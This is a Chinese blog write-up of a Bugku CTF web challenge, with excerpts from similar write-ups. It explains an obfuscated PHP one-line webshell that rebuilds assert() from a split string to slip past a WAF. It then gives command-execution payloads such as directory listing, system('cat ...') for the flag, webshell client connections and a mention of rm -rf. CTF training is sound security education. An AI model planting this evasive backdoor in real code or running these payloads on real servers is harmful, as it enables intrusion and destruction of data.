bugku web22 过狗一句话

最新推荐文章于 2025-06-06 09:28:58 发布
原创 最新推荐文章于 2025-06-06 09:28:58 发布 · 223 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #bugku #web

本文探讨了一个PHP代码中的潜在安全问题。通过示例代码展示了`explode()`函数的使用,以及`assert()`函数在特定情况下可能引发的任意代码执行漏洞。作者指出,构造特定的URL参数,如`s=print_r(scandir(’./’))`,可以尝试利用这个漏洞来执行目录遍历操作。此话题对于理解Web应用安全和防止代码注入至关重要。

题目:过狗一句话

$poc="a#s#s#e#r#t"; 
$poc_1=explode("#",$poc); 
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
$poc_2($_GET['s'])
  • explode(separator,string) separator规定在哪里分割字符串。string要分割的字符串。
  • assert()用于调试,跟eval()差不多,assert函数有任意代码执行的漏洞

构造url?s=print_r(scandir(’./’))
在这里插入图片描述
在这里插入图片描述

PRCORANGE
关注
BUGKU web22 assert注入漏洞
m0_49762339的博客
01-20 559
这道题和攻防世界那道/.git泄露差不多 题目给了提示: <?PHP $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) $poc_1=assert $_GET=s 因此只需要构造payload=?s=XXX即可 这里先尝试payload=?s=phpinfo();存在回显 因
Bugku WEB shell
qq_41696858的博客
07-03 2409
1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过一句话 $poc=“a#s#s#e#r#t”; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 其实就是运用拼接过waf,最后的运行结果是assert($_GET[‘s’]) 很明显assert是能执行shell命令的危险
BugkuCTF-过一句话
臭nana的博客
11-28 1040
提示代码 &lt;?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?&gt; 用assert执行任意函数 payload:?s=print_r(scandi...
BugKu shell
weixin_42152152的博客
10-15 661
编写代码时,我们总是会做出一些假设,断言就是用于在代码中捕捉这些假设,可以将断言看作是异常处理的一种高级形式。程序员断言在程序中的某个特定点该的表达式值为真(为真才能继续执行)。$poc_2为assert,$poc_2()为assert()函数,get传入参数s作为assert()函数的参数。php中的system()就像是 C 语中的函数 system(),用来执行指令,并输出结果。如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。送给大家一个过一句话
bugku-web22
baidu_39504221的博客
12-21 591
送给大家一个过一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) explode("#",$poc); 将$poc以#为分界符号分为数组 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5].
bugku_writeup】web22一句话
kkza的博客
12-31 270
根据提示,这是一个一句话木马 构造payload 用蚁剑操作一下,发现没有用,会报错,这个时候考虑手动爆破 先了解几个函数 print_r() 把数组的键和值均打印出来 scandir() 扫描目录下的目录和文件,并返回数组 __FILE__ :当前目录 得到当前路径 直接访问txt文件 get it! ...
bugku-web-eval
m0_73303597的博客
11-30 1118
自用
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 7293
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugKu Web(26-35)
kid的博客
09-11 1109
BugKu Web(26-35) 前言 发现以前做了几道题,然后凑成了10道写一下。确实做起来会发现和比赛的题相比质量还是要差很多。 但对于我这样的菜鸟拿来练习打打基础还是可以的 题目 过一句话 可以看到提示,给了一个一句话马,简化一下就是assert($_GET[‘s’])这么一个一句话 assert没怎么用过… 查了下可以用下面的函数来搜寻目录 scandir() //作用能扫描文...
[Bugku] web-CTF靶场系列系列详解⑥!!!
muyuchen110的博客
08-09 1216
【代码】[Bugku] web-CTF靶场系列系列详解⑥!!!
Bugku CTF web22Web
ChaoYue_miku的博客
03-05 661
0、打开网页,查看题目描述 送给大家一个过一句话: $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 这句话有什么含义呢,实际上就是代码审计 我们发现GET方法接受了一个变量s,而且也没有什么过滤,因此考虑直接读取文件目录 1、构造并上传payload:http://114.67.2
bugkuweb22(过一句话
EC_Carrot的博客
12-23 316
给坑了一会,这过一句话可以 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 进去后一片空白,什么提示都没有,就那工具去扫,也没扫出来,后来看看wp发现,这个过一句话居然是提示,get传入s就能执行命令,绝了! ?s=print_r(scandir('./')) 直接看到目录下有个fl.
BugKu-web篇-web22
jiuyongpinyin的博客
05-31 164
web22 看了提示就知道需要以GET方式传入s参数,然后就试了一下system()看看能不能直接执行系统命令,发现可以,那这道题目就变得简单起来了,先查看当前目录下的文件 然后直接cat 这个文档 得到flag payload如下: http://114.67.246.176:11188?s=system('cat flaga15808abee46a1d5.txt') 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
bugkuCTF Writeup (Web22-25
Troublor的博客
01-26 1350
成绩单 需要去爆数据库信息 但是发现后台应该是不管查询到多少条记录,只显示一条,所以为了显示爆出的信息,就不能让它查出正常的信息,所以 爆数据库名:-1' union select 1,database(),3,4# 爆表名:-1' union select 1,table_name,3,4 from information_schema.tables where table_sche
CTFBugku一句话
weixin_41607190的博客
10-03 547
原理: 利用assert()函数的漏洞----如果参数中返回的是false,报错但继续执行 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> 上面是题目...
CTF--shell
2401_83809941的博客
04-14 492
(1)提示: $poc="a#s#s#e#r#t";$poc_2($_GET['s'])system:PHP 的一个内置函数,用于在服务器上执行操作系统命令,并将输出直接返回给调用者。ls:Linux 系统中的一个命令,用于列出当前目录下的文件和文件夹。执行rm -rf,删除服务器上的所有文件(假如有权限)
BugKu Web渗透之shell
最新发布
cai_huaer的博客
06-06 521
其实我还用过kali自带的webshell的工具——weevely。但是同样的请求,菜刀可以连接,weevely却不行。我首先想到的是,既然已经有了assert,那我是不是在里面加上 (@$_POST['a']);点击html文件夹,发现一个写着flag名称的txt,再点击txt查看,发现里面就是flag。可是为什么明明已经有了assert我还需要加上eval去连接呢?那么他已经assert了,我们可以拼接一句话木马。拼接的网址,用菜刀来连接。但是很可惜,没有连接成功。打开网页,是一片空白。
web学习05Day
taochiyudadada的博客
05-18 612
我要成为web???? welcome to bugkuctf 这个题很不错 不多说 还是大佬文章 我现在只能跟着大佬走 BUGKU welcome to bugkuctf 考点: 1 php的代码审计, 2 php的伪协议, 3 php的序列化, 4 php魔术方法。 有时候php代码看不懂: php代码查询地址 一 。。代码审计完后: 1.isset — 检测变量是否已设置并且非 NULL 也就是变量有没有值(...
CTF bugku shell】关于assert()代码执行漏洞利用、目录查询函数scandir()/system()
zw05011的博客
01-15 4469
知识点 assert()代码执行漏洞 目录查询函数scandir()/system() 题目 1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 通过代码审计得到asser
Bugku CTF WEB解题技巧分享与讨论
- WAF(Web应用防火墙):一种专门用于保护Web应用的安全设备或服务,可以识别并拦截针对Web应用的攻击。 - localhost(本地主机):计算机上的一个地址,代表本机。 通过分享writeup,参与者不仅可以提升自己的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值